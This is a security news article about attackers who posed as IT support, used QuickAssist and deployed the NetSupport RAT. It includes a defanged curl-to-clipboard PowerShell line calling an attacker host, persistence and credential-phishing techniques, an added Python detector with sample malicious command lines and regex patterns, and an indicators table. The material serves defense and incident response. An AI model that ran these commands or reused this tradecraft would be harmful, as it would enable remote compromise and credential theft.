Hackers Use Social Engineering Attack to Gain Remote Access in 300 Seconds
Threat actors successfully compromised corporate systems within just five minutes using a combination of social engineering tactics and rapid PowerShell execution.
The incident, investigated by NCC Group’s Digital Forensics and Incident Response (DFIR) team, demonstrates how cybercriminals are weaponizing trusted business applications to bypass traditional security measures.
Key Takeaways
1. Hackers impersonated IT support to obtain QuickAssist remote access and compromised the victim systems in under 5 minutes.
2. The attackers deployed the NetSupport Manager RAT.
3. Legitimate tools were weaponized through social engineering, underscoring the need for better user training.
QuickAssist Attack: 300-Second Compromise
The threat actors executed a carefully orchestrated campaign targeting approximately twenty users by impersonating IT support personnel.
After convincing two victims to grant remote access, the attackers abused Windows’ native QuickAssist.exe remote support tool to establish an initial foothold.
Within 300 seconds of gaining access, the adversaries deployed a series of PowerShell commands that downloaded offensive tooling and established multiple persistence mechanisms.
According to the report, the attack sequence began with clipboard manipulation using the command (curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard, followed by the execution of obfuscated PowerShell scripts.
The primary payload download occurred through a sophisticated steganographic technique, where malicious code was embedded within a JPEG file hosted at hxxps://resutato[.]com/b2/res/nh2.jpg.
The script employed XOR decryption with a 4-byte marker (0x31, 0x67, 0xBE, 0xE1) to extract and reconstruct a ZIP archive containing NetSupport Manager components, disguised as “NetHealth” software.
Credential Harvesting
The attackers demonstrated advanced tradecraft by implementing multiple persistence mechanisms.
They created scheduled tasks configured to execute every five minutes using regsvr32.exe with randomized DLL names, and established registry persistence via HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\NETHEALTH.
The malware utilized legitimate binaries like msiexec.exe and GenUp.exe for DLL side-loading attacks, deploying the trojanized libcurl.dll component.
Perhaps most concerning was the deployment of a sophisticated credential harvesting GUI that mimicked legitimate system authentication prompts.
The PowerShell-based interface (C:\Users\{username}\Videos\l.ps1) created a full-screen overlay with a convincing “System Credential Verification” dialog, capturing plaintext credentials to $env:TEMP\cred.txt.
The interface disabled critical Windows functions, including taskbar access and various keyboard shortcuts, to prevent user escape.
Command and Control communication was established with multiple domains, including resutato[.]com and nimbusvaults[.]com, enabling remote management capabilities.
The attack’s success underscores the critical need for enhanced user awareness training and robust incident response capabilities, as even brief security breaches can result in significant organizational compromise.
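As an added example (not code from the NCC Group report or this article), the following Python correlates constructed process-creation events to flag the sequence described above: a QuickAssist launch followed within 300 seconds by a clipboard download, a regsvr32 scheduled task, or the NETHEALTH Run key. Hosts, paths, task names and file names are assumed.

```python
from datetime import datetime, timedelta
import re

# Constructed sample process-creation events (timestamp|host|image|command line),
# not real telemetry; paths, task and file names are made up to mirror the report.
SAMPLE_EVENTS = r"""
2025-06-01T10:00:00|WS01|C:\Windows\System32\QuickAssist.exe|QuickAssist.exe
2025-06-01T10:01:10|WS01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c (curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard
2025-06-01T10:03:30|WS01|C:\Windows\System32\schtasks.exe|schtasks /create /sc minute /mo 5 /tn Upd /tr "regsvr32.exe /s C:\Users\u\AppData\Local\a1b2.dll"
2025-06-01T10:04:05|WS01|C:\Windows\System32\reg.exe|reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v NETHEALTH /t REG_SZ /d C:\Users\u\Videos\client.exe
2025-06-01T11:00:00|WS02|C:\Windows\System32\QuickAssist.exe|QuickAssist.exe
2025-06-01T13:00:00|WS02|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Get-Date
"""

# Behaviours from the report, each expressed as a command-line pattern.
SUSPICIOUS = {
    "clipboard_download": re.compile(r"\b(curl|iwr|Invoke-WebRequest)\b.*\|\s*Set-Clipboard", re.I),
    "regsvr32_task": re.compile(r"schtasks.*/sc\s+minute.*regsvr32", re.I),
    "run_key_nethealth": re.compile(r"CurrentVersion\\Run\b.*NETHEALTH", re.I),
}
WINDOW = timedelta(seconds=300)  # the article's 300-second compromise window


def parse_events(text):
    """Parse 'timestamp|host|image|cmdline' lines; the cmdline may itself contain '|'."""
    events = []
    for line in text.strip().splitlines():
        ts, host, image, cmd = line.split("|", 3)
        events.append((datetime.fromisoformat(ts), host, image.rsplit("\\", 1)[-1].lower(), cmd))
    return events


def correlate(events, window=WINDOW):
    """Return (host, rule, seconds_after_quickassist, cmdline) for suspicious commands
    that follow a QuickAssist launch on the same host within the window."""
    alerts = []
    last_start = {}  # host -> timestamp of the most recent QuickAssist launch
    for ts, host, image, cmd in sorted(events):
        if image == "quickassist.exe":
            last_start[host] = ts
            continue
        start = last_start.get(host)
        if start is None or ts - start > window:
            continue
        for rule, pattern in SUSPICIOUS.items():
            if pattern.search(cmd):
                alerts.append((host, rule, int((ts - start).total_seconds()), cmd))
    return alerts


if __name__ == "__main__":
    for host, rule, secs, cmd in correlate(parse_events(SAMPLE_EVENTS)):
        print(f"{host}: {rule} {secs}s after QuickAssist launch: {cmd[:60]}")
```

On the sample data only WS01 is flagged; the benign PowerShell on WS02 falls outside the window and matches no rule.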
| Value | Type | Comment |
|---|---|---|
| resutato[.]com | Domain | Command & Control |
| hxxps://resutato[.]com/b2/st/st[.]php | URL | Command & Control + Malware download |
| hxxps://resutato[.]com/2-4.txt | URL | Malware download |
| hxxp://196.251.69[.]195 | URL | Malware download |
| 196.251.69[.]195 | IP Address | Malware download |
| 4e57ae0cc388baffa98dd755ac77ee3ca70f2eaa | SHA1 | libcurl.dll |
| df3125365d72abf965368248295a53da1cdceabe | SHA1 | Update.msi |